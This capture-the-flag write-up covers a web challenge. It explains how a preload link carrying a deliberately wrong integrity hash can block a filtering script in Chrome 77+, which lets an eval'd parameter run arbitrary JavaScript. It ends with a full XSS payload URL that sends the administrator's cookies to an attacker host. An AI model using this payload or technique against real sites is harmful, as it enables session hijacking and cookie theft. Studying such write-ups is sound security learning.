Category: Web Points: 500 Solves: 0
Our researchers found out a web interface used by Sophia to run complex calculations. Can you find a way to get the administrator's cookies?
The administrator is using HeadlessChrome/79.0.3945.0.
The challenge's website is concise and you don't have much to work on:
- There is a place to report a link to the administrator (which must be prefixed with http://165.227.115.65/ - the challenge's IP).
- There is a
calcparameter which is being filtered by an external script file (which is same-origin to the challenge's page) and then is being eval'd. - There is a
xssparameter that is being reflected at the end of the body. - The server uses a strict CSP, which doesn't allow you to use the injection to do much.
By looking into the external script file, it is possible to notice that the calc parameter is being filtered as soon as the DOM is loaded and only numbers, +, - are being allowed. The length of characters is also limited to 100.
window.addEventListener('DOMContentLoaded', () => {
let regex = /[^0-9\+\-]+/;
if (calc.length > 100) calc = "1337";
calc = calc.replace(/ /g, "+");
if (regex.test(calc)) calc = "1337";
});Also, by checking the script on the main page, you can see the parameter is only executed after the page is fully loaded - meaning that it will only be eval'd after the external script has a chance to filter the input it got from the calc parameter.
let calc = new URL(location).searchParams.get("calc") || "1337";
onload = () => {
alert(eval(calc));
}After this assessment, one of the realizations is that if you are able to block the external script from loading, you can execute arbitrary javascript.
There has been some research on the subject of selectively blocking subresources (https://www.reddit.com/r/Slackers/comments/c1mpmq/selectively_blocking_subresources_when_xss/).
But none of these prior researches would work in the context of this challenge.
The intended solution required you to find a way to block subresources that were being loaded after the injection point by only using HTML injection.
Before Chrome 77, it was not possible to do the preload of subresources that did an SRI verification without doing a double download of the same resource.
On Chrome 77, a new feature (https://www.chromestatus.com/feature/4967277059375104) was released which started allowing and honoring the integrity attribute on preload links.
It solved the problem of the double download, but created a new "problem" - if the hash on the integrity attribute doesn't match the real hash of the subresource, it will be blocked from loading :)
Knowing that it gets easy to construct a payload that will allow executing arbitrary javascript and stealing the administrator's cookies:
http://165.227.115.65/?xss=<link+rel=preload+as=script+integrity=sha256-1+href=filter.js>&calc=location=`//attacker.com/?${document.cookie}`
CTF-BR{s3l3c71v3_bl0ck1ng++}
If you have any questions feel free to contact me on @lbherrera_